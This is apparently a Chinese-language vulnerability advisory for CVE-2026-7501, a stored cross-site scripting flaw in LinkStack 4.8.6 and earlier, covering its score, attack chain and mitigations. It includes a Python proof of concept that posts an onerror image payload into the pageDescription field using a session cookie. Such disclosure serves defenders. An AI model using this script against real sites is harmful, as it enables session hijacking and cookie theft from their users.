CVE-2026-7501 CVSS 3.5 低危

CVE-2026-7501 LinkStack跨站脚本漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7501

漏洞类型

跨站脚本 (XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

LinkStackOrg LinkStack

漏洞概述

LinkStackOrg LinkStack 4.8.6及之前版本存在跨站脚本漏洞。该漏洞源于文件app/Http/Controllers/UserController.php中的editPage函数对参数pageDescription的处理存在缺陷，未能有效过滤输入。攻击者可利用该漏洞注入恶意脚本，诱导用户交互以执行攻击。目前漏洞利用代码已公开，官方尚未做出修复响应。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS）。在LinkStack系统的用户编辑页面功能中，`app/Http/Controllers/UserController.php`文件的`editPage`函数主要负责处理页面描述信息。由于该函数对用户提交的`pageDescription`参数缺乏足够的输入验证和上下文感知的输出编码，攻击者在拥有低权限账号的情况下，可以构造包含恶意JavaScript代码的Payload。当攻击者将Payload通过编辑功能提交后，恶意脚本会被持久化存储在服务器数据库中。一旦其他用户或管理员访问包含该受污染描述的页面，浏览器便会解析并执行其中的恶意代码。虽然CVSS评分要求用户交互（UI:R），但攻击者仍可利用此漏洞窃取Cookie、劫持用户会话或进行钓鱼攻击，对系统的完整性和安全性构成威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统为LinkStack，并确认版本在4.8.6及以下。

STEP 2

2. 获取权限

攻击者注册或使用低权限账号登录系统（CVSS PR:L）。

STEP 3

3. 注入Payload

攻击者访问编辑页面，在`pageDescription`参数中注入恶意JavaScript代码并保存。

STEP 4

4. 触发漏洞

诱导管理员或其他用户访问包含该恶意描述的页面（CVSS UI:R）。

STEP 5

5. 执行攻击

受害者浏览器解析并执行恶意脚本，可能导致Cookie窃取或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-7501
# Target: LinkStack <= 4.8.6
# Vulnerable Parameter: pageDescription

import requests

def exploit_xss(target_url, session_cookie):
    """Demonstrates the Stored XSS vulnerability via pageDescription"""
    # The XSS payload to be stored
    xss_payload = "<img src=x onerror=alert('CVE-2026-7501')>"

    # Endpoint for editing the user page
    edit_url = f"{target_url}/user/edit/page"

    headers = {
        "Cookie": session_cookie,
        "Content-Type": "application/x-www-form-urlencoded"
    }

    # Data payload including the vulnerable parameter
    data = {
        "pageDescription": xss_payload,
        "pageName": "TestPage"
    }

    try:
        response = requests.post(edit_url, headers=headers, data=data)
        if response.status_code == 200:
            print(f"[+] Payload injected successfully. Visit user page to trigger XSS.")
        else:
            print(f"[-] Failed to inject payload. Status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

影响范围

LinkStackOrg LinkStack <= 4.8.6

防御指南

临时缓解措施

建议暂时禁用用户编辑页面描述的功能，或部署Web应用防火墙（WAF）规则以拦截针对`pageDescription`参数的恶意脚本注入。管理员应审查数据库中已存在的页面描述，清除潜在的恶意内容。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7501
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7501
3 Details https://www.cvedetails.com/cve/CVE-2026-7501/
4 VulDB https://vuldb.com/cve/CVE-2026-7501
5 Link https://github.com/LinkStackOrg/LinkStack/
6 Link https://github.com/LinkStackOrg/LinkStack/pull/974
7 Link https://github.com/az10b/security-advisories/blob/main/stored_xss_linkstack.md
8 Link https://vuldb.com/submit/801651
9 Link https://vuldb.com/vuln/360311
10 Link https://vuldb.com/vuln/360311/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表